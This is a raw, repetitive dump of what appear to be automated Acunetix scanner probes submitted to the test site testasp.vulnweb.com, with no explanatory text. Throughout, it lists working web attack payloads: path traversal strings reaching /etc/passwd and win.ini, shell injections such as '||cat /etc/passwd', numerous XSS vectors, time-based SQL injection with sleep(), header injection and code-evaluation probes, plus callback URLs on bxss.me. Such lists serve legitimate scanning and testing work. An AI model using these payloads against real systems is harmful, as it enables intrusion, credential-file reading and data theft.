1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'

'|'ld

1

1

^(#$!@#$)(()))******

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

1

1

1

-1)

1

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitmC3lTDJrlf.bxss.me/

1

-1))

1

1

'

1

1

comments

${@print(md5(acunetix_wvs_security_test))}\

1

Wb9rCLeJ'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

comments

http://www.acunetix.tst

"

'"

1

1'"()&%<ScRiPt >prompt(939816)</ScRiPt>

1

m7D1FqJx')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

<!--

comments/.

'"()&%<ScRiPt >prompt(988017)</ScRiPt>

1

1

l6XWlsKj'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_968502

1

&dir

1

1

-1

1

1

'&dir&'

1

-1)

1

1

file:///etc/passwd

1

-1))

"&dir&"

1

1

/\../\../\../\../\../\../\../etc/passwd

YfeVlXHP'

|dir

1

WEB-INF/web.xml

1

yoyz00rl')

'|dir

acu9802\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9802

1

WEB-INF\web.xml

nYPeTMRZ'))

1

"|dir

acux10104\xc0\xbez1\xc0\xbcz2a\x90bcxuca10104

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(954552)</ScRiPt>

1

../../../../../../../../../../boot.ini

1<script>prompt(933159)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(923185)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?993710></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(943992)</ScRiPt>

1

................windowswin.ini

1<video><source onerror="javascript:prompt(940703)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972608)"></g></svg>

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(923934))>

1

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<body onload=prompt(957402)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947056)>

1

1<img src=xyz OnErRor=prompt(916086)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img/src=">" onerror=alert(907153)>

1

1

WEB-INF/web.xml

1<ScRiPt%20>prompt(999536)</sCripT>

1

1

1

1&lt

WEB-INF\web.xml

1

1

1

\xf6<img acu onmouseover=prompt(967172) //\xf6>

1

1<input autofocus onfocus=prompt(958779)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1_mJbgn <ScRiPt >prompt(984121)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

response.write(9648021*9840103)

1

1

'+response.write(9648021*9840103)+'

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9648021*9840103)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

${99493+99550}

1some_inexistent_file_with_long_name%00.jpg

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

1

1&n907453=v923032

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

cat /etc/passwd

testasp.vulnweb.com

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

!(()&&!|*|*|

'"()

'

1

|cat /etc/passwd#

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

1

acunetix_wvs_invalid_filename

1

-1)

'|'ld

1

${@print(md5(acunetix_wvs_security_test))}

http://hitqOCtJw736S.bxss.me/

1

comments

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

/etc/passwd

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

GEaQwb9v'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments/.

1

1

1

'

XZEFBwGR')

'"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1'"()&%<ScRiPt >prompt(958605)</ScRiPt>

<!--

edTXhFjH'))

1

1

'"()&%<ScRiPt >prompt(978402)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

1

1

-1

1_912953

1

1

-1)

||cat /etc/passwd

1

1

-1))

1

UxZDNboO'

&dir

file:///etc/passwd

1

6yE510n3')

'&dir&'

1

/\../\../\../\../\../\../\../etc/passwd

zzPb9Qa5'))

"&dir&"

1

WEB-INF/web.xml

1

|dir

acu7635\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7635

WEB-INF\web.xml

1

'|dir

acux9471\xc0\xbez1\xc0\xbcz2a\x90bcxuca9471

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(928491)</ScRiPt>

1

"|dir

../../../../../../../../../../boot.ini

1<script>prompt(999577)</script>

1

1<ScRiPt >prompt(927667)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941662></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(992237)</ScRiPt>

1<video><source onerror="javascript:prompt(913739)">

1

1

................windowswin.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957200)"></g></svg>

1

1

1<div style=width:expression(prompt(903723))>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<iframe src='data:text/html

1

1

1<body onload=prompt(991807)>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959524)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<img src=xyz OnErRor=prompt(935014)>

1

1

1<img/src=">" onerror=alert(905278)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt%20>prompt(903722)</sCripT>

1

1

1&lt

WEB-INF/web.xml

\xf6<img acu onmouseover=prompt(950514) //\xf6>

1

1<input autofocus onfocus=prompt(972474)>

1

<a href='http://www.acunetix.com'>website security</a>

WEB-INF\web.xml

[url=http://www.acunetix.com]website security[/url]

1

1

1_PsVOi <ScRiPt >prompt(909952)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

response.write(9156616*9131225)

1

1

'+response.write(9156616*9131225)+'

1

&cat /etc/passwd&

"+response.write(9156616*9131225)+"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

${100072+99450}

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

cat /etc/passwd

1

1

1

1&n991496=v969729

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

`cat /etc/passwd`

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'"()

!(()&&!|*|*|

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

1

1

1

1

-1

acunetix_wvs_invalid_filename

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

"|"ld

http://hitG4Q65tRoMz.bxss.me/

comments

-1)

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

-1))

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://www.acunetix.tst

1

comments/.

sJXmnKVS'

'"

1'"()&%<ScRiPt >prompt(969875)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

1

'"()&%<ScRiPt >prompt(980402)</ScRiPt>

<!--

a8cUqgIO')

1

1

1

||cat /etc/passwd

1

1

1_935590

1

FITqfNuT'))

file:///etc/passwd

1

&dir

1

1

1

-1

1

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

-1)

1

"&dir&"

1

-1))

WEB-INF/web.xml

1

uNSprLxp'

|dir

WEB-INF\web.xml

4cY5noyN')

1

'|dir

1VgarAyJ'))

../../../../../../../../../../windows/win.ini

1

1

acu4280\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4280

"|dir

1

../../../../../../../../../../boot.ini

acux6819\xc0\xbez1\xc0\xbcz2a\x90bcxuca6819

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(999298)</ScRiPt>

1

1

1<script>prompt(919372)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(979150)</ScRiPt>

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942758></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(944629)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(935996)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931190)"></g></svg>

1

1

1<div style=width:expression(prompt(936546))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(907944)>

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958001)>

1

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(925472)>

1

1

1

1<img/src=">" onerror=alert(923797)>

1

1

1<ScRiPt%20>prompt(962907)</sCripT>

1&lt

1

1

\xf6<img acu onmouseover=prompt(995469) //\xf6>

1

1

1

1<input autofocus onfocus=prompt(944086)>

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_rqWc1 <ScRiPt >prompt(986876)</ScRiPt>

1

1

1

1

1

1

1

response.write(9298544*9571910)

1

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9298544*9571910)+'

1

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9298544*9571910)+"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

${99141+99840}

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

"&cat /etc/passwd&"

1

1&n986759=v942612

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

cat /etc/passwd

testasp.vulnweb.com

!(()&&!|*|*|

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

'"()

`cat /etc/passwd`

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

-1

1

'

1

1

1

1

acunetix_wvs_invalid_filename

"

http://hitUusGgjPbIr.bxss.me/

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

1

comments

1

1

1

${@print(md5(acunetix_wvs_security_test))}

/etc/passwd

"|"ld

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1))

1

http://www.acunetix.tst

1

comments

${@print(md5(acunetix_wvs_security_test))}\

'"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

3zLPX5JZ'

1

comments/.

1

1'"()&%<ScRiPt >prompt(984215)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

ivgvpqEJ')

<!--

'

1

1

'"()&%<ScRiPt >prompt(917585)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

I5UlTEHi'))

"

1

1_996171

1

-1

1

1

||cat /etc/passwd

1

file:///etc/passwd

-1)

1

1

1

&dir

/\../\../\../\../\../\../\../etc/passwd

-1))

1

1

kbKqKacK'

'&dir&'

WEB-INF/web.xml

7qOFMe1m')

1

1

LONpYm6g'))

WEB-INF\web.xml

acu8778\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8778

"&dir&"

1

acux9758\xc0\xbez1\xc0\xbcz2a\x90bcxuca9758

|dir

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(932146)</ScRiPt>

'|dir

../../../../../../../../../../boot.ini

1<script>prompt(957357)</script>

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(925577)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951389></ScRiPt>

1

1<ScRiPt >prompt(923191)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(921709)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947659)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<div style=width:expression(prompt(951463))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

1

1<body onload=prompt(906870)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999934)>

1

1<img src=xyz OnErRor=prompt(978438)>

1

1

WEB-INF/web.xml

1

1<img/src=">" onerror=alert(973202)>

1

1

1<ScRiPt%20>prompt(991179)</sCripT>

WEB-INF\web.xml

1

1

1&lt

\xf6<img acu onmouseover=prompt(947947) //\xf6>

1

1<input autofocus onfocus=prompt(983537)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_Dd2Lb <ScRiPt >prompt(983819)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

&cat /etc/passwd&

1

response.write(9940512*9683038)

1

'+response.write(9940512*9683038)+'

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9940512*9683038)+"

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99246+100210}

1

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1&n947141=v988394

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'"()

!(()&&!|*|*|

testasp.vulnweb.com

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

'

"|"ld

1

1

acunetix_wvs_invalid_filename

1

-1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1

http://hitdQlWAegUy0.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

comments

/etc/passwd

1

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

DYWVWOrw'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'"

"

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(931164)</ScRiPt>

l6jd4JjK')

1

1

comments/.

1

ug93TTFb'))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<!--

1

1

||cat /etc/passwd

1

1

-1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"()&%<ScRiPt >prompt(993390)</ScRiPt>

1

1

1

-1)

1

&dir

1

1_911671

1

'&dir&'

-1))

file:///etc/passwd

1

1

4WYywwAP'

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

JVSR9rge')

1

WEB-INF/web.xml

|dir

8KTq7vNn'))

1

'|dir

1

WEB-INF\web.xml

1

"|dir

acu7615\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7615

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acux2290\xc0\xbez1\xc0\xbcz2a\x90bcxuca2290

1

1

1<ScRiPt >prompt(926075)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(950988)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(949833)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947566></ScRiPt>

................windowswin.ini

1

1<ScRiPt >prompt(972460)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(917976)">

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946490)"></g></svg>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(953303))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<body onload=prompt(901109)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(923667)>

1

WEB-INF/web.xml

1

1

1<img src=xyz OnErRor=prompt(904776)>

1

WEB-INF\web.xml

1

1

1<img/src=">" onerror=alert(947736)>

1

1<ScRiPt%20>prompt(989260)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(954657) //\xf6>

1

1<input autofocus onfocus=prompt(932223)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_9zT02 <ScRiPt >prompt(942631)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9476729*9061617)

1

'+response.write(9476729*9061617)+'

1

&cat /etc/passwd&

"+response.write(9476729*9061617)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

${99974+99633}

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1&n913964=v996901

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

)

1

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

`cat /etc/passwd`

'"()

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

|cat /etc/passwd#

'

1

1

1

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

1

-1)

'|'ld

1

"

http://hit7FqTXaFp3w.bxss.me/

1

1

acunetix_wvs_invalid_filename

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}

"|"ld

1

1

dyN2C2de'

comments

1

/etc/passwd

'"

http://www.acunetix.tst

${@print(md5(acunetix_wvs_security_test))}\

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

R6Zj1ooI')

<!--

1

'

1

1

1

NrAJbory'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments/.

1

"

1'"()&%<ScRiPt >prompt(943725)</ScRiPt>

-1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

'"()&%<ScRiPt >prompt(971928)</ScRiPt>

-1)

1

1

-1))

1_918105

1

1

wfxb272u'

&dir

1

file:///etc/passwd

1

laM7XKUP')

1

1

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

e9pQ8OXG'))

1

"&dir&"

1

WEB-INF/web.xml

|dir

1

WEB-INF\web.xml

'|dir

1

acu5022\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5022

"|dir

../../../../../../../../../../windows/win.ini

acux9984\xc0\xbez1\xc0\xbcz2a\x90bcxuca9984

1

1<ScRiPt >prompt(966407)</ScRiPt>

1

../../../../../../../../../../boot.ini

1<script>prompt(909658)</script>

1

1

1

1<ScRiPt >prompt(999472)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?953233></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(969396)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(981424)">

................windowswin.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992815)"></g></svg>

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(954979))>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<iframe src='data:text/html

1

1

1<body onload=prompt(983807)>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904510)>

1

1<img src=xyz OnErRor=prompt(944671)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<img/src=">" onerror=alert(953647)>

1

1<ScRiPt%20>prompt(953684)</sCripT>

1

1

WEB-INF/web.xml

1&lt

1

1

\xf6<img acu onmouseover=prompt(909022) //\xf6>

1<input autofocus onfocus=prompt(955323)>

1

WEB-INF\web.xml

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_24MLv <ScRiPt >prompt(992264)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

response.write(9772691*9504837)

1

&cat /etc/passwd&

'+response.write(9772691*9504837)+'

1

1

"+response.write(9772691*9504837)+"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

${99842+100396}

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1&n958850=v965854

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

)

1

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

`cat /etc/passwd`

!(()&&!|*|*|

